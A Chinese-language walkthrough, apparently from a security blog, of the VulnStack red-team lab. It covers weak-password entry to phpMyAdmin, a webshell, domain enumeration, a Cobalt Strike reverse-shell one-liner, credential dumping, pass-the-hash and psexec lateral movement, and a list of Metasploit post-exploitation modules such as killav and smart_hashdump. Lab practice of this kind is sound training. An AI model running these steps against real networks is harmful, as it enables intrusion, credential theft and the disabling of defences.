VulnStack-红队实战(一)

前言

  此靶场对初学域渗透的人,非常友好,一路也是非常顺利的打下来。

信息搜集

  经过nmap扫描出以下ip对应信息
  192.168.52.138 Windows Server 2008
  192.168.52.143 Win7
  192.168.52.141 Windows Server 2003
  继续扫描win7详细信息

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
135/tcp  open  msrpc   Microsoft Windows RPC
3306/tcp open  mysql   MySQL (unauthorized)

  访问得到PHPStudy探针,同时获取到绝对路径C:/phpStudy/WWW
  
  使用弱口令root root成功登录
  
  必不可少的环节,使用御剑扫到了PhpMyAdmin,一样使用root root即可成功登录
  

getshell

  之前写过phpMyAdmin之getshell,也就不再重复写了。直接使用蚁剑连接
  
  使用nslookup -type=SRV _ldap._tcp查找域控,发现域为god.org。域控ip:192.168.52.138
  
  net view查找局域网内其他主机名,其中本机名为stu1
  
  net group "domain admins" /domain查找域管理员
  
  net user Administrator /domain 获取指定域用户Administrator的信息
  
  非常幸运,shell获取到了一个域管理员,为了方便后面的后渗透阶段,可以使用cs进行联动。

横向移动

  使用cs的Scripted Web Delivery生成powershell一句话木马,在到靶机上执行,即可反弹shell
  
  使用net view探测内网存活主机信息
  
  继续使用hashdump,查看本机用户哈希
  
  使用logonpasswords。此命令作用,只要在此台电脑上输入密码登录过,就会得到用户和明文密码
  在view下的Credentials,会保存得到的用户信息
  
  这里登录win7的时候要强制改密码,我将密码设置成了hongrisec@2021,可看到成功抓取到了。获取到了这么多哈希可以使用批量的hash传递攻击。因为域内的用户名和密码基本都是相同的。前提是对方开了445和139,并且防火墙要放行。
  创建一个beacon smb,为了后面攻击时的稳定性
  
  在view下的Targets会保存扫描到的主机信息,这里先攻击域控,选择psexec
  
  如下图选择,点击launch
  
  成功反弹
  
  之后继续使用相同的方法,也能成功攻击192.168.52.141
  
  如果没有解出明文密码,最简单的方法就是将psexec里面的每个选项都试一遍,cs会自动切换到pth攻击。
  比如,此处选择未解密的那条
  
  和前面的psexec攻击截图对比,就能发现差异
  
  打靶结束收工!

扩展

cs派生msf

  msf有批量爆破smb的功能,这里需要cs派生给msf。cs4.x与3.x派生方法有点不同。故此记录一遍
  msf输入handler -H 192.168.52.128 -P 3333 -p windows/meterpreter/reverse_http,注意这里是reverse_http。开启监听3333端口。
  来到cs,创建foreigh http监听器
  
  右键选择要派生的对象,再选择Spawn,选择刚刚设置的msf,点击choose,即可派生成功
  
  

msf其他模块

  use auxiliary/scanner/smb/smb_version # 探测系统信息
  
  exploit/windows/smb/psexec 反弹shell。用的时候先不设置密码和用户,直接run,有些时候能成功。可传hash或者明文密码。这模块玄乎的很,密码啥都对的,win server 2008能成功打下来,win server 2003不行。批量hash传递还得看cs,快和稳!

  use auxiliary/admin/smb/ms17_010_command 执行一些系统权限的命令,这个win server 2003就能成功利用。
  

exploit/windows/smb/ms17_010_psexec # 打一个shell回来
run post/windows/manage/migrate           #自动进程迁移
run post/windows/gather/checkvm           #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav            #关闭杀毒软件
run post/windows/manage/enable_rdp        #开启远程桌面服务
run post/windows/manage/autoroute         #查看路由信息
run post/windows/gather/enum_logged_on_users    #列举当前登录的用户
run post/windows/gather/enum_applications       #列举应用程序
run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run post/windows/gather/smart_hashdump               #dump出所有用户的hash
run getgui -u hack -p 123
run post/windows/gather/enum_patches   补丁信息
run  post/multi/recon/local_exploit_suggester   查询可利用的漏洞

参考资料

Metasploit和Cobaltstrike内网域渗透分析(实战总结)
MSF和Impacket后渗透拿域控

查看评论 -
评论